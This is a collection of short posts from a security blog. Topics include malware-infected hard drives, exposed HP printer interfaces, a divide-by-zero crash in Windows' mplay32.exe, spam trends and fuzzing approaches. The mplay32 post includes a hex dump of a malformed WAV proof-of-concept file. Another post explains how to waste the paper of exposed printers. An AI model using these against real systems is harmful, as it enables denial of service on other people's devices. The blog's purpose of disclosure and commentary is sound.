Another case of the infected HD

A second event of malware infected HD has been discovered, this the second time it has happened in 4 months. The HD are part of “about 1,800 brand new 300-GB or 500-GB external hard drives made for Maxtor in Thailand” that include an autorun.inf file that will execute as soon as the disk is placed into the computer.

More details on the background can be found here and a bit more details on the origin can be read here.

In the old days this wouldn’t have happened as disks were “factory formatted” – requiring you to do a low-level format to start working with them, or at least partition them before use and they weren’t pre-formatted or even contained data on them.
P.S of course Windows is the only operating system that will get infected – Linux or MacOS won’t care about the presence of the autorun.inf file (or the ghost.pif file that is launched by it).

Share

Prevent paper-waste

I have noticed that a few people have been careless enough to leave their HP LaserJet (maybe others are also relevant) HTTP interface open to the Internet. Even though most of the functionality is disabled, you can still screw around with it by asking it to print the font list, which isn’t a total waste :) of paper unless you do this repeativily until the printer runs out of paper.

I would recommend NOT allowing your printers to be visible from the Internet.

(BTW: I found 20 such devices open, but I guess a better Google query could find more)

Share

PCM 0day (Divide by Zero)

The debate about the term “zero days” is not directly related to this PCM vulnerability I am about to reveal, but as this vulnerability is not publicly documented, as far as I know, I will call it a 0day.

The vulnerability allows you to crash the mplay32.exe – that for some reason is still shipped with Windows up to version 2003, maybe also Vista, can someone confirm? – this low-quality and feature-lacking (software-wise) player contains a problem where a malformed PCM file can cause it to crash as it tries to divide one number by zero.
00000000 52 49 46 46 24 00 00 1a 57 41 56 45 66 6d 74 20
|RIFF$…WAVEfmt |
00000010 10 00 00 00 01 00 02 00 44 ac 00 00 88 58 01 00
|……..D….X..|
00000020 00 00 10 00 64 61 74 61 00 00 00 1a 00 00 24 17
|….data……$.|
00000030 1e f3 3c 13 3c 14 16 f9 18 f9 34 e7 23 a6 3c f2
|..< .<.....4.#.<.|
00000040 24 f2 11 ce 1a 0d
|$.....|
Is this vulnerability interesting? not really - mplay32.exe is no longer the default player - unless you are still in the stone-age (i.e. have never upgraded your system or Internet Explorer) - and it allows you to do nothing but crash the player.

If someone can find out more about this issue, I will be happy to hear.

BTW: This PCM vulnerability was discovered by beSTORM’s PCM (WAV) fuzzing module – which was launched against mplay32.exe

Share

IMF going to be boring this year

The IMF (IT-Incident Management & IT-Forensics conference) is going to be boring this year, and I am not saying this because I wasn’t invited (hint :) ) its because Germany has recently passed a law that forbids:
German citizens to research, discuss or disclouse security problems.

Making it illegal for German citizens to participate in the conference and possibly making the guys organizing this conference act in an illegal manner.

The only ray of light here is the fact that RUS-CERT are the guys behind it, and they might be linked high enough to avoid prosecution – hopefully :) .

Share

Buy stuff from spam mail

Finally after years of receiving it I tried to buy something out of the spam I got, but damn it is difficult, and who is to blame? the spam killers – filters, finders and removers, because of them I can no longer read what the spammer is actually trying to sell me :) even worse when I do call the guy up he is so amazed to hear someone call him that he asks me to call again as he is in his car – kudos to lev here :) .

Here is a sample of what I mean:

Subject: The MFC library shipping with Visual C++ 4.

Body:

u){e} [N](e)[w][s] To I^mpact {C}{V}
C^hina You.TV {C}{r}

(.)
Sym*bol: [C]{T}[V]
We (a)(v) alre-ady {s}[e]{n} CYT+V’s m,arket i+mpact befor#e climbi_n.g to {o}[v][r] $2^.00 {w}{i}(t){h} (n)[e][s]< .>
P^ress Relea`se:
C-hina YouTV’_s Cn^Boo {e} (S){i}[t][e] R+anks [N][o]< .>[1] on M.icr*osoft {i}{v}[e] S+earch E-ngine
CnBo*o Traff.ic Increa,se*s [4]<9>< %> {O}[v] (T)(o) M+onths
{R}[a][d] [t][h](e) ne.ws, th_ink a*bout {t}(h)(e) impa`ct, and
{j}(u)

on {h}{i}(s) f+irst thin`g Tomo#r+row m^*orning! $0*.42 is a (g)(i)[f][t] at (t)[h]{s} pr_#ice…..
Do (y)[o][u] homew+or-k (n)(d) w_atch (t){h}{i}(s) tra*de Mo,nday mo,rning.

What is this? :P I can’t read this! even if I tried I wouldn’t spend so much time trying to read it, as I don’t spend much time reading other types of perfectly legal advertisements :P .

Share

ZZZ of the month

This has to be the ZZZest (sleep for those that didn’t get the idea) post of the month, a guy called Hamachiya found a vulnerability that crashes IE 7 and IE6, no big news here – aren’t there a few or even few dozen such vulnerabilities already?, still for no obvious reason but the fact that he wrote it in Japanese it got Slashdot headlines.

Am I missing something or is this part of the “no-news week, therefore we take anything that looks remotely interesting”?

Share

Intel’s vPro ad is here, safe at last

Judging from this ad life is good, before we had a lot of security issues, now with Hardware on our side of the battle for complete security, everything is ok :)

Share

DOC spam

Just weeks after we started getting PDF spam, this morning I received my very first DOC spam. The document spam talks about the usual “I am Barrister Musa Adams a Solicitor. I am the Personal Attorney to MR. Harry Edward Cook a national of your country, who used to work with CADBURY NIGERIA LIMITED, on the 21st of April 2004, my client, his wife and their three children were involved in a car accident along Shagamu Lagos Express Road.” which makes it very uninteresting, but unlike “regular” (non-DOC) spam of this sort, it doesn’t get filtered as documents aren’t currently being scanned for spam.

Now that we are done with PDF and DOC, what is left? :) RTF?

Share

Neo1973 breaks the last boundery to GSM fuzzing

With the new mobile phone by Neo Advanced I no longer see anything stopping people from doing GSM fuzzing (cheaply) or even attacking the GSM network as well as any infrastructure located on the GSM network. Until recently this kind of testing required (very) expensive hardware now the Linux based phone should solve it.

Update 1: It appears that the GSM drivers aren’t open sourced, so they cannot be easily used to fuzz, but if they aren’t “encrypted/protected” maybe you can use beSTORM‘s API fuzzing?

Update 2: I mistakenly gave credit to OpenMoko instead to the phone in the title.

Share

Flashback – Virtual Sex with Commwarrior

When I first read this post I must confess I was intrigued to read more about what has Virtual Sex have to do with Commwarrior, it sounds too good to be true, for a second there I though it was all about how people were sending each other some form of Porn on their cellular which gets their phone infected – and why wasn’t I receiving them? :)

But as I read one, I understood that “Sex sells while Security blows” (not literally… this is a site for everyone not just adults), in any case Happy birthday blogs.securiteam.com you are now two years old!

Share

PDF spam

I have been getting lately more and more PDF based spam, the PDF itself appears to be just a cover for the normal image spam. The idea I believe is that PDF is not investigated by most spam filtering agents, and is not regarded by spam filtering as a “score giver” (i.e. what makes the email look more spamish than others).

BTW: At first glance I though it was a malware or a exploit that uses PDF as its carrying bag, but after a days work of investigating, and probing the file with various PDF readers (non-standard ones), I concluded that it had nothing to do with a malware or an exploit :) kudos to me :P

Share

Presenting vulnerabilities and patches as IP

A company called Intellectual Weapons wants to sell your vulnerabilities and the patches that fix them for the a lot of money, in order to do that they want to patent any vulnerability and patch combinations they get their hands on, so that anyone using that vulnerability or patch will be required to pay them money.

This sounds like a spinoff from the idea behind iDEFENSE.

But sounds a lot worse, as they plan on suing anyone patching their system without paying them royalties. I can’t emphasize how bad this sounds, but it reminds me of bad ideas, for example BlueSecurity’s approach to fighting spam with an attack on the spammers.

Share

FuzzGuru’s approach to fuzzing

Recently I have seen a lecture by John of Microsoft about their FuzzGuru framework, apparently their approach to fuzzing is through tight integration with code coverage tools, in similar fashion a recently published paper by Microsoft Research, Automated Whitebox Fuzz Testing, shows that this is in fact Microsoft’s approach to fuzzing.
Though this approach seems to provide good results to Microsoft, I am not sure it is a good approach to the majority of people that develop software, as in the security testing phase there is usually little chance that the source code will be available for code coverage testing.

Some would think that binary form code coverage might work as well, I disagree as generic code coverage will make the fuzzer confused as it would not concentrate on the parser part of the program which our fuzzer needs to test.

We’ve been toying with the idea of implementing both source code coverage and binary code coverage in beSTORM but I’m not sure I’m convinced yet that the code coverage approach is beneficial.

Share

Malware went commerical

In a post by Brian Krebs in the Washington post, Brian describes how Virus (malware) makers have started to spend cash on buying sponsored links of high-profile keywords which get regularly visited by poorly patched people so that they can infect them with malwares.

One such high-profile keyword is the BBB, the Better Business Bureau, which as you would guess it most average joes would go to visit and will look for, while buying something like Slashdot won’t :) .

This of course is an interesting move, though not so much unexpected. I can see an “legit-company” coming soon, where a company of such malware distribution will have an R&D – create new malwares and find new vulnerabilities, Marketing – buy high profile keywords, or generally get people interested in your malware infected web site and Sales – sell bot nets and infected/hacked computers for money type of organizations.

Share

extractQuotedChar() function blamed for RPC vulnerability

According to the exploit released by H.D. Moore’s metasploit project, the function responsible for the RPC DNS server vulnerability is caused by extractQuotedChar() function. No additional details on what is the purpose of this function.

Share

When is a security researcher (white hacker) a journalist?

One of the issues raised here in Malware’07 is whether a security research, white hacker or ethical hacker, can be considered a journalist.

The analogy is that a journalist uncovers fraud, mis-use, bad quality, etc in products, one example is poisonous food for cats informs the public, is he liable to being sued for damages by the company making the food?

In the same sense, a security researcher finding a vulnerability in Windows Vista, and reporting it to the public, is he liable to being sued by Microsoft for damages being  caused by this vulnerability?

The debate is on, one thing is for sure, until it reaches the court, no one will know for sure whether the researcher is protected by the same laws that protects the journalist.

Share